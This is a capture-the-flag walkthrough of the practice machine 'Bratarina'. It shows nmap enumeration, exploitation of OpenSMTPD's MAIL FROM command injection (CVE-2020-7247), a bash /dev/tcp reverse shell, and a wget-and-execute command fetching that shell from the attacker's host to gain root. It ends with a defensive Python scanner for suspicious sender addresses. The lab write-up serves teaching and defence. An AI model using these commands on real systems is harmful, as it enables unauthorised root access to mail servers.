Bratarina
Enumeration:
Port Scanning:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Bratarina]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 192.168.225.71
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-05 08:38 +03
Nmap scan report for 192.168.225.71
Host is up, received echo-reply ttl 61 (0.17s latency).
Scanned at 2025-10-05 08:38:56 +03 for 231s
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db:dd:2c:ea:2f:85:c5:89:bc:fc:e9:a3:38:f0:d7:50 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDJ0GZmmFtQUJbj2HgPsye2Xccyyh9mC8fsCwIivM4x3o3mwZDNi6g+Y6nIs5SuOJj2IpS+E9O5wB71MSIv7d7XYrd6paprfvnvMCyAQ9VTn8py6CQ/OsgeOITU+JnAxoe3WQ
klpyAVqhJ7ASqAInZF8oHDaebr6gBKEq4nkoLOtJSZeB8xWDHhbQZjG6AY81Y2mHPZH/LC4gSXpSmw+3h0zhlCN/kxeyhjrsrZqIVdKhg4emds8+gQyu1Wrz4AUUBGscI6Sh5rjImr+SC4rAGgn6N0MVPcZA1mS0JUplz758Y3YF
XstqO2SdaHB/Qb50fkcpclcYKibSbCv5ZLNzOf
| 256 e3:b7:65:c2:a7:8e:45:29:bb:62:ec:30:1a:eb:ed:6d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOWgZAzhJ+plc4Rk/YyGvQ1KOKK9j31ix1uCWIAirjnZS/lKwcvYrkG+lVsJRBnBYVA+67ILSJR2YNVz9uZshPE=
| 256 d5:5b:79:5b:ce:48:d8:57:46:db:59:4f:cd:45:5d:ef (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC2Z9krPXlbEN6Xl40sc3BiVLfhbtd+l5ZFNBKkF7pYT
25/tcp open smtp syn-ack ttl 61 OpenSMTPD
| smtp-commands: bratarina Hello nmap.scanme.org [192.168.45.235], pleased to meet you, 8BITMIME, ENHANCEDSTATUSCODES, SIZE 36700160, DSN, HELP
|_ 2.0.0 This is OpenSMTPD 2.0.0 To report bugs in the implementation, please contact bugs@openbsd.org 2.0.0 with full details 2.0.0 End of HELP info
80/tcp open http syn-ack ttl 61 nginx 1.14.0 (Ubuntu)
|_http-title: Page not found - FlaskBB
|_http-server-header: nginx/1.14.0 (Ubuntu)
445/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 4.7.6-Ubuntu (workgroup: COFFEECORP)
Service Info: Host: bratarina; OS: Linux; CPE: cpe:/o:linux:linux_kernel

We have SSH running on port 22, SMTP on port 25, HTTP on port 80, and finally Samba on port 445.
We will go through those ports one by one.
For port 22 we cannot do anything unless we have a set of credentials, the version is old, or we brute force some well-known users such as root.
For ports 445 and 80, I did not find anything useful.
Exploitation:
SMTP (25):
We will search for any public exploits for OpenSMTPD:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Bratarina]
└─$ searchsploit OpenSMTPD
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
OpenSMTPD - MAIL FROM Remote Code Execution (Metasploit) | linux/remote/48038.rb
OpenSMTPD - OOB Read Local Privilege Escalation (Metasploit) | linux/local/48185.rb
OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution | openbsd/remote/48051.pl
OpenSMTPD 6.6.1 - Remote Code Execution | linux/remote/47984.py
OpenSMTPD 6.6.3 - Arbitrary File Read | linux/remote/48139.c
OpenSMTPD < 6.6.3p1 - Local Privilege Escalation + Remote Code Execution | openbsd/remote/48140.c
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

We can try any of them; I will start with the standalone Python one:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Bratarina]
└─$ searchsploit -m linux/remote/47984.py
Exploit: OpenSMTPD 6.6.1 - Remote Code Execution
URL: https://www.exploit-db.com/exploits/47984
Path: /usr/share/exploitdb/exploits/linux/remote/47984.py
Codes: CVE-2020-7247
Verified: True
File Type: Python script, ASCII text executable
Copied to: /home/kali/Desktop/CTF/Machines/OffsecPG/Practice/Bratarina/47984.py

The exploit above abuses a command injection in the sender address (the MAIL FROM field) of the SMTP transaction.
When we run it without any arguments:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Bratarina]
└─$ python3 47984.py
Usage 47984.py <target ip> <target port> <command>
E.g. 47984.py 127.0.0.1 25 'touch /tmp/x'

We will first check whether the exploit actually works by making the target ping our own host while we watch for the packets with tcpdump:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Bratarina]
└─$ sudo tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes

We send the ping requests:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Bratarina]
└─$ python3 47984.py 192.168.225.71 25 'ping 192.168.45.235 -c 4'
[*] OpenSMTPD detected
[*] Connected, sending payload
[*] Payload sent
[*] Done

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Bratarina]
└─$ sudo tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
09:04:40.795116 IP 192.168.225.71 > 192.168.45.235: ICMP echo request, id 1809, seq 1, length 64
09:04:40.795498 IP 192.168.45.235 > 192.168.225.71: ICMP echo reply, id 1809, seq 1, length 64
09:04:41.751491 IP 192.168.225.71 > 192.168.45.235: ICMP echo request, id 1809, seq 2, length 64
09:04:41.751526 IP 192.168.45.235 > 192.168.225.71: ICMP echo reply, id 1809, seq 2, length 64
09:04:42.868668 IP 192.168.225.71 > 192.168.45.235: ICMP echo request, id 1809, seq 3, length 64
09:04:42.868706 IP 192.168.45.235 > 192.168.225.71: ICMP echo reply, id 1809, seq 3, length 64
09:04:43.831654 IP 192.168.225.71 > 192.168.45.235: ICMP echo request, id 1809, seq 4, length 64
09:04:43.831691 IP 192.168.45.235 > 192.168.225.71: ICMP echo reply, id 1809, seq 4, length 64

Indeed, this is the way in.
I will write a simple sh script to give me a reverse shell on port 445 because this was one of the open ports, and host it using a python web server:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Bratarina]
└─$ cat shell.sh
#!/bin/bash
bash -i >& /dev/tcp/192.168.45.235/445 0>&1

If you pass this directly as the argument to the exploit, or even wrap it in bash -c, it will error out because of the special characters.
Host it:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Bratarina]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Download it to the /tmp folder and start it with bash (or give it execute permission and run it directly), but before that we should start our nc listener as well:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Bratarina]
└─$ nc -nlvp 445
listening on [any] 445 ...

Run the exploit:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Bratarina]
└─$ python3 47984.py 192.168.225.71 25 'wget 192.168.45.235/shell.sh -O /tmp/shell.sh; bash /tmp/shell.sh'
[*] OpenSMTPD detected
[*] Connected, sending payload
[*] Payload sent
[*] Done

Check our web server and the netcat listener:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Bratarina]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.225.71 - - [05/Oct/2025 09:22:09] "GET /shell.sh HTTP/1.1" 200 -

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Bratarina]
└─$ nc -nlvp 445
listening on [any] 445 ...
connect to [192.168.45.235] from (UNKNOWN) [192.168.225.71] 34198
bash: cannot set terminal process group (1980): Inappropriate ioctl for device
bash: no job control in this shell
root@bratarina:~# id
uid=0(root) gid=0(root) groups=0(root)

We rooted the box.
Get the flag:
root@bratarina:~# cat proof.txt
6bfb0ecf56cdce4d4b1dc5c3e0f7636a
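The vulnerability this box was rooted through lives in the sender address of the MAIL FROM command. As an added defender-side example (not part of this writeup or of OpenSMTPD), the following Python scans an SMTP session transcript and flags reverse-paths that fall outside a conservative address grammar; the grammar and the sample transcript are constructed assumptions, so treat it as a detection heuristic rather than an RFC validator.

```python
import re

# Conservative reverse-path grammar (assumption for this example): a local
# part from a reduced character set, an @, then a hostname. RFC 5321 permits
# more characters than this, so the check is a heuristic. The empty reverse
# path <> (bounce messages) is legitimate and is accepted. A bare address
# without angle brackets is tolerated because some clients send it that way.
ADDR = r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+"
SAFE_PATH = re.compile(rf"^(?:<(?:{ADDR})?>|{ADDR})$")

# Matches the MAIL FROM command and captures the reverse-path token only,
# leaving any ESMTP parameters (SIZE=..., BODY=...) behind.
MAIL_FROM = re.compile(r"^\s*MAIL\s+FROM:\s*(\S+)", re.IGNORECASE)


def parse_mail_from(line):
    """Return the reverse-path from a MAIL FROM line, or None for other commands."""
    m = MAIL_FROM.match(line)
    return m.group(1) if m else None


def is_suspicious(path):
    """True when the reverse-path does not fit the conservative grammar."""
    return SAFE_PATH.match(path) is None


def scan_session(lines):
    """Return (line_number, path) for every suspicious MAIL FROM in a transcript."""
    hits = []
    for n, line in enumerate(lines, 1):
        path = parse_mail_from(line)
        if path is not None and is_suspicious(path):
            hits.append((n, path))
    return hits


# Constructed client-side transcript: two normal senders, one bounce, and one
# sender whose local part carries a shell metacharacter.
SAMPLE_SESSION = [
    "EHLO client.example.test",
    "MAIL FROM:<alice@example.test> SIZE=2048",
    "RCPT TO:<bob@bratarina>",
    "RSET",
    "MAIL FROM:<>",
    "MAIL FROM:<a;b@example.test>",
    "DATA",
]

if __name__ == "__main__":
    for n, path in scan_session(SAMPLE_SESSION):
        print(f"line {n}: suspicious reverse-path {path}")
```

Run over a mail server's command log instead of the constructed list, this gives a cheap alert for injection attempts against the MAIL FROM handling that the writeup exploits.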